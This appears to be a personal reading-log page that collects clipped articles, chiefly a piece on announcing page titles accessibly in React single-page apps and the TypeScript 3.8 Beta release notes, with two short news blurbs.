    January 15, 2020 · ~5 minutes Over the summer, we, at N26, got the company Temesis to audit the accessibility of our web application. As part of their comprehensive and exhaustive report, we learnt that we were not handling page titles properly. Traditionally, following a link causes the page to reload with the content of the new page. This makes it possible for screen-readers to pick up on the new page title and announce it. With single-page applications using a JavaScript-powered routing system, only the content of the page tends to be reloaded in order to improve the perceived performance of the page. In this article, I will share what I learnt from Temesis and how to make sure the title of your React SPAs is accessible to assistive technologies. Overview We will build a teeny-tiny React application with react-router and react-helmet. Our application will consist of: A top-level component rendering a navigation and the router. Three different pages served under different paths. A “page title announcer”, the core topic of our article. The main idea is that every page will define its own title. The page title announcer listens for page changes, stores the page title and renders it in a visually hidden paragraph which gets focused. This enables screen-readers to announce the new page title. You can already look at the code on CodeSandbox. Boilerplate code To begin with, let’s create our page components. Each page is a simply React component rendering a &lt;h1&gt; element, and a &lt;title&gt; element with react-helmet. Now, let’s create a top-level component which will handle the routing to these different pages. To keep it simple, let’s take it (almost) as is from the basic example of react-router. It is our &lt;TitleAnnouncer&gt; component (described in the next section), a navigation, and a router. Title announcer The last missing piece of the puzzle is the actual title announcer. It does a few things: It holds the page title in a local state. It renders said title in a visually hidden paragraph (here with the .sr-only class). It listens to Helmet data change to update the local state. It listens for page change to focus the hidden paragraph (hence the tabIndex={-1}). Wrapping up That is all that is needed to handle page titles in an accessible way in a single-page React application. The react-router and react-helmet libraries are not necessary either, and the same pattern should be applicable regardless of the library (or lack thereof) in use. Note that if you have a simple application and can guarantee there is always a relevant &lt;h1&gt; element (independently of loading states, query errors and such), another, possibly simpler solution arises. It should be possible to skip that hidden element altogether, and focus the &lt;h1&gt; element instead (still with tabIndex={-1}). This solution could not scale for us as we have hundreds of sometimes complex and dynamic pages, some with a visible &lt;h1&gt; element, some with a hidden one, and so on. Feel free to play with the code on CodeSandbox. Read previous post: Let’s talk about your resume Read next post: An accessible visibility React component Source: Accessible page title in a single-page React application | Hugo Giraudel

    Read at 02:58 am, Jan 23rd

Day of Jan 22nd, 2020

  • No state-owned internet in NY, for now: Cuomo vetoes bill to study state service in rural areas

    Story Highlights The New York state Assembly proposed legislation in 2019 that would study a potential state-owned internet service for New York's rural areas. The service would be in addition to New York's Broaband for All program. Gov. Andrew Cuomo vetoed the bill in Dec. 2019.

    Read at 11:53 pm, Jan 22nd

  • The 100 Worst Ed-Tech Debacles of the Decade

    For the past ten years, I have written a lengthy year-end series, documenting some of the dominant narratives and trends in education technology. I think it is worthwhile, as the decade draws to a close, to review those stories and to see how much (or how little) things have changed.

    Read at 11:51 pm, Jan 22nd

  • Announcing TypeScript 3.8 Beta | TypeScript

    Announcing TypeScript 3.8 Beta Daniel .entry-meta Today we’re announcing the availability of TypeScript 3.8 Beta! This Beta release contains all the new features you should expect from TypeScript 3.8’s final release. To get started using the beta, you can get it through NuGet, or through npm with the following command: npm install typescript@beta You can also get editor support by TypeScript 3.8 brings a lot of new features, including new or upcoming ECMAScript standards features, new syntax for importing/exporting only types, and more. Type-Only Imports and Export TypeScript reuses JavaScript’s import syntax in order to let us reference types. For instance, in the following example, we’re able to import doThing which is a JavaScript value along with Options which is purely a TypeScript type. // ./foo.ts interface Options { // ... } export function doThing(options: Options) { // ... } // ./bar.ts import { doThing, Options } from "./foo.js"; function doThingBetter(options: Options) { // do something twice as good doThing(options); doThing(options); } This is convenient because most of the time we don’t have to worry about what’s being imported – just that we’re importing something. Unfortunately, this only worked because of a feature called import elision. When TypeScript outputs JavaScript files, it sees that Options is only used as a type, and it automatically drops its import. The resulting output looks kind of like this: Again, this behavior is usually great, but it causes some other problems. First of all, there are some places where it’s ambiguous whether a value or a type is being exported. For example, in the following example is MyThing a value or a type? import { MyThing } from "./some-module.js"; export { MyThing }; Limiting ourselves to just this file, there’s no way to know. Both Babel and TypeScript’s transpileModule API will emit code that doesn’t work correctly if MyThing is only a type, and TypeScript’s isolatedModules flag will warn us that it’ll be a problem. The real problem here is that there’s no way to say “no, no, I really only meant the type – this should be erased”, so import elision isn’t good enough. The other issue was that TypeScript’s import elision would get rid of import statements that only contained imports used as types. That caused observably different behavior for modules that have side-effects, and so users would have to insert a second import statement purely to ensure side-effects. // This statement will get erased because of import elision. import { SomeTypeFoo, SomeOtherTypeBar } from "./module-with-side-effects"; // This statement always sticks around. import "./module-with-side-effects"; A concrete place where we saw this coming up was in frameworks like Angular.js (1.x) where services needed to be registered globally (which is a side-effect), but where those services were only imported for types. // ./service.ts export class Service { // ... } register("globalServiceId", Service); // ./consumer.ts import { Service } from "./service.js"; inject("globalServiceId", function (service: Service) { // do stuff with Service }); As a result, ./service.js will never get run, and things will break at runtime. To avoid this class of issues, we realized we needed to give users more fine-grained control over how things were getting imported/elided. As a solution in TypeScript 3.8, we’ve added a new syntax for type-only imports and exports. import type { SomeThing } from "./some-module.js"; export type { SomeThing }; import type only imports declarations to be used for type annotations and declarations. It always gets fully erased, so there’s no remnant of it at runtime. Similarly, export type only provides an export that can be used for type contexts, and is also erased from TypeScript’s output. It’s important to note that classes have a value at runtime and a type at design-time, and the use is very context-sensitive. When using import type to import a class, you can’t do things like extend from it. import type { Component } from "react"; interface ButtonProps { // ... } class Button extends Component&lt;ButtonProps&gt; { // ~~~~~~~~~ // error! 'Component' only refers to a type, but is being used as a value here. // ... } If you’ve used Flow before, the syntax is fairly similar. One difference is that we’ve added a few restrictions to avoid code that might appear ambiguous. // Is only 'Foo' a type? Or every declaration in the import? // We just give an error because it's not clear. import type Foo, { Bar, Baz } from "some-module"; // ~~~~~~~~~~~~~~~~~~~~~~ // error! A type-only import can specify a default import or named bindings, but not both. In conjunction with import type, we’ve also added a new compiler flag to control what happens with imports that won’t be utilized at runtime: importsNotUsedAsValues. At this point the name is tentative, but this flag takes 3 different options: remove: this is today’s behavior of dropping these imports. It’s going to continue to be the default, and is a non-breaking change. preserve: this preserves all imports whose values are never used. This can cause imports/side-effects to be preserved. error: this preserves all imports (the same as the preserve option), but will error when a value import is only used as a type. This might be useful if you want to ensure no values are being accidentally imported, but still make side-effect imports explicit. For more information about the feature, you can take a look at the pull request. Type-Only vs Erased There is a final note about this feature. In TypeScript 3.8 Beta, only the type meaning of a declaration will be imported by import type. That means that you can’t use values even if they’re purely used for type positions (like in the extends clause of a class declared with the declare modifier, and the typeof type operator). import type { Base } from "my-library"; let baseConstructor: typeof Base; // ~~~~ // error! 'Base' only refers to a type, but is being used as a value here. declare class Derived extends Base { // ~~~~ // error! 'Base' only refers to a type, but is being used as a value here. } We’re looking at changing this behavior based on recent feedback. Instead of only importing the type side of declarations, we’re planning on changing the meaning of import type to mean “import whatever this is, but only allow it in type positions.” In other words, things imported using import type can only be used in places where it won’t affect surrounding JavaScript code. While this behavior is not in the beta, you can expect it in our upcoming release candidate, and keep track of that work on its respective pull request. ECMAScript Private Fields TypeScript 3.8 brings support for ECMAScript’s private fields, part of the stage-3 class fields proposal. This work was started and driven to completion by our good friends at Bloomberg! class Person { #name: string constructor(name: string) { this.#name = name; } greet() { console.log(`Hello, my name is ${this.#name}!`); } } let jeremy = new Person("Jeremy Bearimy"); jeremy.#name // ~~~~~ // Property '#name' is not accessible outside class 'Person' // because it has a private identifier. Unlike regular properties (even ones declared with the private modifier), private fields have a few rules to keep in mind. Some of them are: Private fields start with a # character. Sometimes we call these private names. Every private field name is uniquely scoped to its containing class. TypeScript accessibility modifiers like public or private can’t be used on private fields. Private fields can’t be accessed or even detected outside of the containing class – even by JS users! Sometimes we call this hard privacy. Apart from “hard” privacy, another benefit of private fields is that uniqueness we just mentioned. For example, regular property declarations are prone to being overwritten in subclasses. class C { foo = 10; cHelper() { return this.foo; } } class D extends C { foo = 20; dHelper() { return this.foo; } } let instance = new D(); // 'this.foo' refers to the same property on each instance. console.log(instance.cHelper()); // prints '20' console.log(instance.dHelper()); // prints '20' With private fields, you’ll never have to worry about this, since each field name is unique to the containing class. class C { #foo = 10; cHelper() { return this.#foo; } } class D extends C { #foo = 20; dHelper() { return this.#foo; } } let instance = new D(); // 'this.#foo' refers to a different field within each class. console.log(instance.cHelper()); // prints '10' console.log(instance.dHelper()); // prints '20' Another thing worth noting is that accessing a private field on any other type will result in a TypeError! class Square { #sideLength: number; constructor(sideLength: number) { this.#sideLength = sideLength; } equals(other: any) { return this.#sideLength === other.#sideLength; } } const a = new Square(100); const b = { sideLength: 100 }; // Boom! // TypeError: attempted to get private field on non-instance // This fails because 'b' is not an instance of 'Square'. console.log(a.equals(b)); Finally, for any plain .js file users, private fields always have to be declared before they’re assigned to. JavaScript has always allowed users to access undeclared properties, whereas TypeScript has always required declarations for class properties. With private fields, declarations are always needed regardless of whether we’re working in .js or .ts files. For more information about the implementation, you can check out the original pull request Which should I use? We’ve already received many questions on which type of privates you should use as a TypeScript user: most commonly, “should I use the private keyword, or ECMAScript’s hash/pound (#) private fields?” Like all good questions, the answer is not good: it depends! When it comes to properties, TypeScript’s private modifiers are fully erased – that means that while the data will be there, nothing is encoded in your JavaScript output about how the property was declared. At runtime, it acts entirely like a normal property. That means that when using the private keyword, privacy is only enforced at compile-time/design-time, and for JavaScript consumers, it’s entirely intent-based. class C { private foo = 10; } // This is an error at compile time, // but when TypeScript outputs .js files, // it'll run fine and print '10'. console.log(new C().foo); // prints '10' // ~~~ // error! Property 'foo' is private and only accessible within class 'C'. // TypeScript allows this at compile-time // as a "work-around" to avoid the error. console.log(new C()["foo"]); // prints '10' The upside is that this sort of “soft privacy” can help your consumers temporarily work around not having access to some API, and works in any runtime. On the other hand, ECMAScript’s # privates are completely inaccessible outside of the class. class C { #foo = 10; } console.log(new C().#foo); // SyntaxError // ~~~~ // TypeScript reports an error *and* // this won't work at runtime! console.log(new C()["#foo"]); // prints undefined // ~~~~~~~~~~~~~~~ // TypeScript reports an error under 'noImplicitAny', // and this prints 'undefined'. This hard privacy is really useful for strictly ensuring that nobody can take use of any of your internals. If you’re a library author, removing or renaming a private field should never cause a breaking change. As we mentioned, another benefit is that subclassing can be easier with ECMAScript’s # privates because they really are private. When using ECMAScript # private fields, no subclass ever has to worry about collisions in field naming. When it comes to TypeScript’s private property declarations, users still have to be careful not to trample over properties declared in superclasses. Finally, something to consider is where you intend for your code to run. TypeScript currently can’t support this feature unless targeting ECMAScript 2015 (ES6) targets or higher. This is because our downleveled implementation uses WeakMaps to enforce privacy, and WeakMaps can’t be polyfilled in a way that doesn’t cause memory leaks. In contrast, TypeScript’s private-declared properties work with all targets – even ECMAScript 3! Kudos! It’s worth reiterating how much work went into this feature from our contributors at Bloomberg. They were diligent in taking the time to learn to contribute features to the compiler/language service, and paid close attention to the ECMAScript specification to test that the feature was implemented in compliant manner. They even improved another 3rd party project, CLA Assistant, which made contributing to TypeScript even easier. We’d like to extend a special thanks to: export * as ns Syntax It’s often common to have a single entry-point that exposes all the members of another module as a single member. import * as utilities from "./utilities.js"; export { utilities }; This is so common that ECMAScript 2020 recently added a new syntax to support this pattern! export * as utilities from "./utilities.js"; This is a nice quality-of-life improvement to JavaScript, and TypeScript 3.8 implements this syntax. When your module target is earlier than es2020, TypeScript will output something along the lines of the first code snippet. Special thanks to community member Wenlu Wang (Kingwl) who implemented this feature! For more information, check out the original pull request. Top-Level await Most modern environments that provide I/O in JavaScript (like HTTP requests) is asynchronous, and many modern APIs return Promises. While this has a lot of benefits in making operations non-blocking, it makes certain things like loading files or external content surprisingly tedious. To avoid .then chains with Promises, JavaScript users often introduced an async function in order to use await, and then immediately called the function after defining it. To avoid introducing an async function, we can use a handy upcoming ECMAScript feature called “top-level await“. Previously in JavaScript (along with most other languages with a similar feature), await was only allowed within the body of an async function. However, with top-level await, we can use await at the top level of a module. const response = await fetch("..."); const greeting = await response.text(); console.log(greeting); // Make sure we're a module export {}; Note there’s a subtlety: top-level await only works at the top level of a module, and files are only considered modules when TypeScript finds an import or an export. In some basic cases, you might need to write out export {} as some boilerplate to make sure of this. Top level await may not work in all environments where you might expect at this point. Currently, you can only use top level await when the target compiler option is es2017 or above, and module is esnext or system. Support within several environments and bundlers may be limited or may require enabling experimental support. For more information on our implementation, you can check out the original pull request. es2020 for target and module Thanks to Kagami Sascha Rosylight (saschanaz), TypeScript 3.8 supports es2020 as an option for module and target. This will preserve newer ECMAScript 2020 features like optional chaining, nullish coalescing, export * as ns, and dynamic import(...) syntax. It also means bigint literals now have a stable target below esnext. TypeScript 3.8 supports JavaScript files by turning on the allowJs flag, and also supports type-checking those JavaScript files via the checkJs option or by adding a // @ts-check comment to the top of your .js files. Because JavaScript files don’t have dedicated syntax for type-checking, TypeScript leverages JSDoc. TypeScript 3.8 understands a few new JSDoc tags for properties. First are the accessibility modifiers: @public, @private, and @protected. These tags work exactly like public, private, and protected respectively work in TypeScript. @public is always implied and can be left off, but means that a property can be reached from anywhere. @private means that a property can only be used within the containing class. @protected means that a property can only be used within the containing class, and all derived subclasses, but not on dissimilar instances of the containing class. Next, we’ve also added the @readonly modifier to ensure that a property is only ever written to during initialization. watchOptions TypeScript has strived to provide reliable file-watching capabilities in --watch mode and in editors for years. While it’s worked well for the most part, it turns out that file-watching in Node.js is hard, and its drawbacks can be reflected in our logic. The built-in APIs in Node.js are either CPU/energy-intensive and inaccurate (fs.watchFile) or they’re wildly inconsistent across platforms (fs.watch). Additionally, it’s practically impossible to determine which API will work better because it depends not only on the platform, but the file system on which a file resides. This has been a struggle, because TypeScript needs to run on more platforms than just Node.js, and also strives to avoid dependencies to be entirely self-contained. This especially applies to dependencies on native Node.js modules. Because every project might work better under different strategies, TypeScript 3.8 introduces a new watchOptions field in tsconfig.json and jsconfig.json which allows users to tell the compiler/language service which watching strategies should be used to keep track of files and directories. watchOptions contains 4 new options that can be configured: watchFile: the strategy for how individual files are watched. This can be set to fixedPollingInterval: Check every file for changes several times a second at a fixed interval. priorityPollingInterval: Check every file for changes several times a second, but use heuristics to check certain types of files less frequently than others. dynamicPriorityPolling: Use a dynamic queue where less-frequently modified files will be checked less often. useFsEvents (the default): Attempt to use the operating system/file system’s native events for file changes. useFsEventsOnParentDirectory: Attempt to use the operating system/file system’s native events to listen for changes on a file’s containing directories. This can use fewer file watchers, but might be less accurate. watchDirectory: the strategy for how entire directory trees are watched under systems that lack recursive file-watching functionality. This can be set to: fixedPollingInterval: Check every directory for changes several times a second at a fixed interval. dynamicPriorityPolling: Use a dynamic queue where less-frequently modified directories will be checked less often. useFsEvents (the default): Attempt to use the operating system/file system’s native events for directory changes. fallbackPolling: when using file system events, this option specifies the polling strategy that gets used when the system runs out of native file watchers and/or doesn’t support native file watchers. This can be set to fixedPollingInterval: (See above.) priorityPollingInterval: (See above.) dynamicPriorityPolling: (See above.) synchronousWatchDirectory: Disable deferred watching on directories. Deferred watching is useful when lots of file changes might occur at once (e.g. a change in node_modules from running npm install), but you might want to disable it with this flag for some less-common setups. For more information on watchOptions, head over to GitHub to see the pull request. “Fast and Loose” Incremental Checking TypeScript’s --watch mode and --incremental mode can help tighten the feedback loop for projects. Turning on --incremental mode makes TypeScript keep track of which files can affect others, and on top of doing that, --watch mode keeps the compiler process open and reuses as much information in memory as possible. However, for much larger projects, even the dramatic gains in speed that these options afford us isn’t enough. For example, the Visual Studio Code team had built their own build tool around TypeScript called gulp-tsb which would be less accurate in assessing which files needed to be rechecked/rebuilt in its watch mode, and as a result, could provide drastically low build times. Sacrificing accuracy for build speed, for better or worse, is a tradeoff many are willing to make in the TypeScript/JavaScript world. Lots of users prioritize tightening their iteration time over addressing the errors up-front. As an example, it’s fairly common to build code regardless of the results of type-checking or linting. TypeScript 3.8 introduces a new compiler option called assumeChangesOnlyAffectDirectDependencies. When this option is enabled, TypeScript will avoid rechecking/rebuilding all truly possibly-affected files, and only recheck/rebuild files that have changed as well as files that directly import them. For example, consider a file fileD.ts that imports fileC.ts that imports fileB.ts that imports fileA.ts as follows: fileA.ts &lt;- fileB.ts &lt;- fileC.ts &lt;- fileD.ts In --watch mode, a change in fileA.ts would typically mean that TypeScript would need to at least re-check fileB.ts, fileC.ts, and fileD.ts. Under assumeChangesOnlyAffectDirectDependencies, a change in fileA.ts means that only fileA.ts and fileB.ts need to be re-checked. In a codebase like Visual Studio Code, this reduced rebuild times for changes in certain files from about 14 seconds to about 1 second. While we don’t necessarily recommend this option for all codebases, you might be interested if you have an extremely large codebase and are willing to defer full project errors until later (e.g. a dedicated build via a tsconfig.fullbuild.json or in CI). For more details, you can see the original pull request. Breaking Changes TypeScript 3.8 contains a few minor breaking changes that should be noted. Stricter Assignability Checks to Unions with Index Signatures Previously, excess properties were unchecked when assigning to unions where any type had an index signature – even if that excess property could never satisfy that index signature. In TypeScript 3.8, the type-checker is stricter, and only “exempts” properties from excess property checks if that property could plausibly satisfy an index signature. const obj1: { [x: string]: number } | { a: number }; obj1 = { a: 5, c: 'abc' } // ~ // Error! // The type '{ [x: string]: number }' no longer exempts 'c' // from excess property checks on '{ a: number }'. let obj2: { [x: string]: number } | { [x: number]: number }; obj2 = { a: 'abc' }; // ~ // Error! // The types '{ [x: string]: number }' and '{ [x: number]: number }' no longer exempts 'a' // from excess property checks against '{ [x: number]: number }', // and it *is* sort of an excess property because 'a' isn't a numeric property name. // This one is more subtle. object in JSDoc is No Longer any Under noImplicitAny Historically, TypeScript’s support for checking JavaScript has been lax in certain ways in order to provide an approachable experience. For example, users often used Object in JSDoc to mean, “some object, I dunno what”, we’ve treated it as any. This is because treating it as TypeScript’s Object type would end up in code reporting uninteresting errors, since the Object type is an extremely vague type with few capabilities other than methods like toString and valueOf. However, TypeScript does have a more useful type named object (notice that lowercase o). The object type is more restrictive than Object, in that it rejects all primitive types like string, boolean, and number. Unfortunately, both Object and object were treated as any in JSDoc. Because object can come in handy and is used significantly less than Object in JSDoc, we’ve removed the special-case behavior in JavaScript files when using noImplicitAny so that in JSDoc, the object type really refers to the non-primitive object type. What’s Next? Now that the beta is out, our team has been focusing largely on bug fixes and polish for what will eventually become TypeScript 3.8. As you can see on our current Iteration Plan, we’ll have one release candidate (a pre-release) in a couple of weeks, followed by a full release around mid-February. As editor features we’ve developed become more mature, we’ll also show off functionality like Call Hierarchy and the “convert to template string” refactoring. If you’re able to give our beta a try, we would highly appreciate your feedback! So download it today, and happy hacking! – Daniel Rosenwasser and the TypeScript Team Source: Announcing TypeScript 3.8 Beta | TypeScript

    Read at 01:35 pm, Jan 22nd